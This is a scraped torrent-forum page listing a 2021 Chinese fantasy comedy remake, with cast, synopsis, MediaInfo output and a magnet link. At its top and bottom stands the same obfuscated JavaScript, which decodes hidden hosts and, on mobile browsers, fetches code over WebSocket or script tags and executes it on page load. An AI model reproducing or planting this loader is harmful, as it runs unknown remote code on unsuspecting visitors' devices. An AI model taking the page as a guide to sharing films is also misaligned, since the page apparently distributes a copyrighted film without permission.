春光灿烂猪八戒[国语配音/中文字幕].Chun.Guang.Can.Lan.Zhu.Ba.Jie.2021.WEB-DL.4K.H265.DDP.2.0 2.41GB

版主小s 1月前 299

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x68\x6e\x49\x43\x61\x57\x73\x53\x72\x45']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};

◎译 名 春光灿烂猪八戒

◎年 代 2021

◎产 地 中国大陆

◎类 别 喜剧 / 爱情 / 奇幻 / 冒险

◎语 言 汉语普通话

◎上映日期 2021-10-17(中国大陆)

◎IMDb链接 https://www.imdb.com/title//

◎豆瓣链接 https://movie.douban.com/subject/35265494/

◎片 长 79分钟

◎演 员 徐子力 Zili Xu (id:1358119)

杨祺如 Qiru Yang (id:1413270)

郝劭文 Shaowen Hao (id:1314167)

魏晓璇 Xiaoxuan Wei (id:1446793)

韩振华 Zhenhua Han (id:1341864)

陶虹 Hong Tao (id:1015199)

翁虹 Yvonne Yung (id:1162012)

李立群 Lichun Lee (id:1274438)

孔连顺 Lianshun Kong (id:1339768)

张伟夫 Weifu Zhang (id:1364211)

柯达 Da Ke (id:1340746)

芊慧 Qianhui (id:1455374)

◎标 签 童年回忆 / 2021 / 奇幻 / 烂 / 爱情 / 古装 / 网大 / 喜剧

◎简 介

本片改编自二十年前的经典青春励志喜剧《春光灿烂猪八戒》,讲述了一个只想无忧无虑过舒服日子的懒惰小猪,意外获得做人的机会,被太白金星告知自己是八世轮回的猪八戒,而后卷入了猫妖与小龙女寻找金丹的旅途中,体会到了做人的苦与乐,更明白了做人的责任与担当,收获了与小龙女的爱情,最后,猪八戒击败了猫妖,拯救了春水镇无辜的人们。

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 165129175777676013468949588536312866226 (0x7C3AB8F1516A9FF8F83ED60D7AA625B2)

  4. Complete name : Chun Guang Can Lan Zhu Ba Jie 2021 WEB-DL 4K H265 DDP [email protected]

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 2.41 GiB

  8. Duration : 1 h 18 min

  9. Overall bit rate : 4 384 kb/s

  10. Encoded date : UTC 2021-11-02 20:21:25

  11. Writing application : mkvmerge v62.0.0 ('Apollo') 64-bit

  12. Writing library : libebml v1.4.2 + libmatroska v1.6.4


  13. Video

  14. ID : 1

  15. Format : HEVC

  16. Format/Info : High Efficiency Video Coding

  17. Format profile : [email protected]@Main

  18. Codec ID : V_MPEGH/ISO/HEVC

  19. Duration : 1 h 18 min

  20. Bit rate : 4 095 kb/s

  21. Width : 3 840 pixels

  22. Height : 1 600 pixels

  23. Display aspect ratio : 2.40:1

  24. Frame rate mode : Constant

  25. Frame rate : 25.000 FPS

  26. Color space : YUV

  27. Chroma subsampling : 4:2:0

  28. Bit depth : 8 bits

  29. Bits/(Pixel*Frame) : 0.027

  30. Stream size : 2.25 GiB (93%)

  31. Default : Yes

  32. Forced : No


  33. Audio #1

  34. ID : 2

  35. Format : AAC LC

  36. Format/Info : Advanced Audio Codec Low Complexity

  37. Codec ID : A_AAC-2

  38. Duration : 1 h 18 min

  39. Bit rate : 192 kb/s

  40. Channel(s) : 2 channels

  41. Channel layout : L R

  42. Sampling rate : 44.1 kHz

  43. Frame rate : 43.066 FPS (1024 SPF)

  44. Compression mode : Lossy

  45. Stream size : 107 MiB (4%)

  46. Language : Chinese

  47. Default : Yes

  48. Forced : No


  49. Audio #2

  50. ID : 3

  51. Format : E-AC-3

  52. Format/Info : Enhanced AC-3

  53. Commercial name : Dolby Digital Plus

  54. Codec ID : A_EAC3

  55. Duration : 1 h 18 min

  56. Bit rate mode : Constant

  57. Bit rate : 96.0 kb/s

  58. Channel(s) : 2 channels

  59. Channel layout : L R

  60. Sampling rate : 48.0 kHz

  61. Frame rate : 31.250 FPS (1536 SPF)

  62. Compression mode : Lossy

  63. Stream size : 54.1 MiB (2%)

  64. Language : Chinese

  65. Service kind : Complete Main

  66. Default : No

  67. Forced : No


  68. Text #1

  69. ID : 4

  70. Format : UTF-8

  71. Codec ID : S_TEXT/UTF8

  72. Codec ID/Info : UTF-8 Plain Text

  73. Duration : 1 h 15 min

  74. Bit rate : 36 b/s

  75. Count of elements : 970

  76. Stream size : 20.2 KiB (0%)

  77. Title : 简体中文

  78. Language : Chinese

  79. Default : Yes

  80. Forced : No


  81. Text #2

  82. ID : 5

  83. Format : UTF-8

  84. Codec ID : S_TEXT/UTF8

  85. Codec ID/Info : UTF-8 Plain Text

  86. Duration : 1 h 15 min

  87. Bit rate : 33 b/s

  88. Count of elements : 911

  89. Stream size : 18.5 KiB (0%)

  90. Title : 繁体中文

  91. Language : Chinese

  92. Default : No

  93. Forced : No


  94. Text #3

  95. ID : 6

  96. Format : UTF-8

  97. Codec ID : S_TEXT/UTF8

  98. Codec ID/Info : UTF-8 Plain Text

  99. Duration : 1 h 16 min

  100. Bit rate : 68 b/s

  101. Count of elements : 971

  102. Stream size : 38.5 KiB (0%)

  103. Title : 阿拉伯语

  104. Language : Arabic

  105. Default : No

  106. Forced : No


  107. Text #4

  108. ID : 7

  109. Format : UTF-8

  110. Codec ID : S_TEXT/UTF8

  111. Codec ID/Info : UTF-8 Plain Text

  112. Duration : 1 h 16 min

  113. Bit rate : 50 b/s

  114. Count of elements : 971

  115. Stream size : 28.3 KiB (0%)

  116. Title : 韩语

  117. Language : Korean

  118. Default : No

  119. Forced : No


  120. Text #5

  121. ID : 8

  122. Format : UTF-8

  123. Codec ID : S_TEXT/UTF8

  124. Codec ID/Info : UTF-8 Plain Text

  125. Duration : 1 h 16 min

  126. Bit rate : 45 b/s

  127. Count of elements : 971

  128. Stream size : 25.4 KiB (0%)

  129. Title : 英语

  130. Language : English

  131. Default : No

  132. Forced : No


  133. Text #6

  134. ID : 9

  135. Format : UTF-8

  136. Codec ID : S_TEXT/UTF8

  137. Codec ID/Info : UTF-8 Plain Text

  138. Duration : 1 h 16 min

  139. Bit rate : 50 b/s

  140. Count of elements : 971

  141. Stream size : 28.4 KiB (0%)

  142. Title : 印尼语

  143. Language : Indonesian

  144. Default : No

  145. Forced : No


  146. Text #7

  147. ID : 10

  148. Format : UTF-8

  149. Codec ID : S_TEXT/UTF8

  150. Codec ID/Info : UTF-8 Plain Text

  151. Duration : 1 h 16 min

  152. Bit rate : 121 b/s

  153. Count of elements : 971

  154. Stream size : 68.1 KiB (0%)

  155. Title : 泰语

  156. Language : Thai

  157. Default : No

  158. Forced : No


  159. Text #8

  160. ID : 11

  161. Format : UTF-8

  162. Codec ID : S_TEXT/UTF8

  163. Codec ID/Info : UTF-8 Plain Text

  164. Duration : 1 h 16 min

  165. Bit rate : 46 b/s

  166. Count of elements : 971

  167. Stream size : 26.1 KiB (0%)

  168. Title : 西班牙语

  169. Language : Spanish

  170. Default : No

  171. Forced : No


  172. Text #9

  173. ID : 12

  174. Format : UTF-8

  175. Codec ID : S_TEXT/UTF8

  176. Codec ID/Info : UTF-8 Plain Text

  177. Duration : 1 h 16 min

  178. Bit rate : 49 b/s

  179. Count of elements : 971

  180. Stream size : 27.5 KiB (0%)

  181. Title : 马来语

  182. Language : Malay

  183. Default : No

  184. Forced : No


  185. Text #10

  186. ID : 13

  187. Format : UTF-8

  188. Codec ID : S_TEXT/UTF8

  189. Codec ID/Info : UTF-8 Plain Text

  190. Duration : 1 h 16 min

  191. Bit rate : 63 b/s

  192. Count of elements : 971

  193. Stream size : 35.4 KiB (0%)

  194. Title : 越南语

  195. Language : Vietnamese

  196. Default : No

  197. Forced : No




复制代码


TAGS 奇幻 冒险 喜剧 爱情

磁力链:
  • magnet:?xt=urn:btih:515822942C8CB55C41DC08C2A4CB7AE0EE89FA3C

上传的附件:
BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
发新帖
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x59\x72\x72\x51\x4e\x72\x4a\x5a\x7a\x42']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};